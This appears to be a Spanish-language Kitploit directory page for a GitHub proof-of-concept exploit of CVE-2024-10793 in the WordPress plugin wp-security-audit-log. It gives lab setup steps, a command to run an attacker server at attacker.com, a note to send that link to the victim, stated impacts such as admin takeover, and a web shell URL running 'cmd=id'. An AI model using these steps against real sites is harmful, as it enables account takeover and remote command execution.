Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-10793 — Exploit de prueba de concepto para CVE-2024-10793 dirigido al plugin de WordPress wp-security-audit-log. Demuestra toma de control de cuenta, creación de usuarios privilegiados, subida de shell y manipulación de administradores mediante solicitudes HTTP manipuladas. | Kitploit
Herramientas/GitHubGitHub/mahajian/cve-2024-10793
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebDesarrollo de Payloads
GitHubmahajian/cve-2024-10793

CVE-2024-10793

Exploit de prueba de concepto para CVE-2024-10793 dirigido al plugin de WordPress wp-security-audit-log. Demuestra toma de control de cuenta, creación de usuarios privilegiados, subida de shell y manipulación de administradores mediante solicitudes HTTP manipuladas.

Ver Repositorio
211hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-10793 PoC

Añade estas líneas a tu archivo hosts:

root@kitploit:~
127.0.0.1  goodcms.lab
127.0.0.1  attacker.com

Lanza WordPress usando docker:

root@kitploit:~
$ sudo systemctl start docker
$ sudo docker-compose up -d

Abre http://goodcms.lab:2121 y sigue los pasos de instalación de WordPress. Instala wp-security-audit-log.5.2.1 o versiones anteriores en WordPress.

Lanza el servidor atacante:

root@kitploit:~
$ php -S 0:9091 -t ./exploit

Entrega http://attacker.com a la víctima y ¡Bingo!

Impactos del exploit:

  • Añadir usuario privilegiado.
  • Cambiar el perfil del administrador actual
  • Eliminar a todos los administradores excepto el hacker :)
  • Subida de shell
  • Cerrar sesión

alt text

Toma de control de cuenta y creación de usuario privilegiado PoC: Credenciales del atacante tras el exploit: { email: [email protected], username: amin, password: 123456 } (Puedes cambiarlas desde el código de xpl.js.)

Ejecuta el comando Shell: http://goodcms.lab:2121/wp-content/plugins/sogrid/shell.php?cmd=id

alt text

Descargar herramienta